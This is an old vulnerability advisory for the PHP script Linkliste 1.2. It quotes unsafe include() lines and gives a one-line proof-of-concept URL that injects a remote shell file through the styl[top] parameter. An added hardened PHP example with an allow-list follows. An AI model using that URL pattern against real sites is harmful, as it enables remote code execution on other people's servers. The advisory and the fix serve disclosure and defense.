0day Linkliste Version 1.2 Remote File Include by iNs

2007-08-13T00:00:00
ID SECURITYVULNS:DOC:17752
Type securityvulns
Reporter Securityvulns
Modified 2007-08-13T00:00:00

Description

Hi, I found a new bug in this script, and I wanted to ask you if you could post it on securityvulns.com (thanks in advance .. iNs). Here is what should be posted:

App Name : Linkliste Version 1.2
HomePage : http://www.mapos-scripts.de/downloads.php?download=3
Vuln type : Remote File Include (RFI)
Vuln Discovered by : iNs

Vuln Code: index.php

include($styl[top]);

also

include($url_eintrag);

also

include($styl[themen]);

Note: All these vars are not defined beforehand, so remote malicious code can be included.

POC: htttp://site.com/[path]/index.php?styl[top]=SHELL.txt??

iNs @ uNkn0wn.eu

Gr33tz t0: uNkn0wn.eu - iD - Stel128 - Spitfire - fEaRz - R1der - Stranger21 - nexos - sh4m4n - Svarshik DRT Memb3rz - s[H]4g - deL - l10m - l1l - r00tm1nd - f|_|ck3r - p1mmy ActiveSpy - r100z - The_PitBull

.: uNkn0wn.eu CreW :.
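
A hardened form of the include pattern quoted above, as an added example that is not part of the original advisory or of Linkliste: request parameters can only pre-seed $styl[top] when PHP turns them into globals (register_globals, or extract() on request data), so the code initialises the array itself and resolves every include from a fixed allow-list. The slot names, file names and resolve_template() are assumptions for illustration.

```php
<?php
// Added example, not Linkliste code. Slot names, file names and paths are assumptions.

// Fixed map of template slots to local files; request data never supplies a path.
const TEMPLATES = ['top' => 'top.php', 'themen' => 'themen.php'];

/**
 * Return the absolute path for a template slot, or null when the slot is
 * unknown or the file does not resolve to a location inside $baseDir.
 */
function resolve_template(string $slot, string $baseDir): ?string
{
    if (!array_key_exists($slot, TEMPLATES)) {
        return null;                          // not on the allow-list
    }
    $base = realpath($baseDir);
    $path = realpath($baseDir . DIRECTORY_SEPARATOR . TEMPLATES[$slot]);
    if ($base === false || $path === false) {
        return null;                          // missing directory or file
    }
    // realpath() collapses ".." and symlinks; require the result under $base.
    $prefix = $base . DIRECTORY_SEPARATOR;
    return strncmp($path, $prefix, strlen($prefix)) === 0 ? $path : null;
}

// Constructed demo: a throwaway template directory with two local files.
$dir = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'tpl_demo_' . getmypid();
@mkdir($dir);
foreach (TEMPLATES as $slot => $file) {
    file_put_contents($dir . DIRECTORY_SEPARATOR . $file, '<?php echo "[' . $slot . ' template]\n";');
}

// Constructed request data in the shape the advisory describes.
$_GET = ['styl' => ['top' => 'http://example.invalid/x.txt']];

// Initialise $styl in code before any include, so nothing from the request
// (register_globals, extract(), ...) can pre-seed it.
$styl = [];
foreach (array_keys(TEMPLATES) as $slot) {
    $styl[$slot] = resolve_template($slot, $dir);
}

// Where the request does choose a page, it chooses a slot name, never a path.
foreach (['themen', 'http://example.invalid/x.txt', 'unknown'] as $wanted) {
    echo $wanted, ' => ', resolve_template($wanted, $dir) === null ? 'rejected' : 'allowed', "\n";
}

include $styl['top'];                         // always the vetted local top.php
```

Independently of the code fix, keeping allow_url_include disabled in php.ini stops include() from fetching http:// or ftp:// URLs.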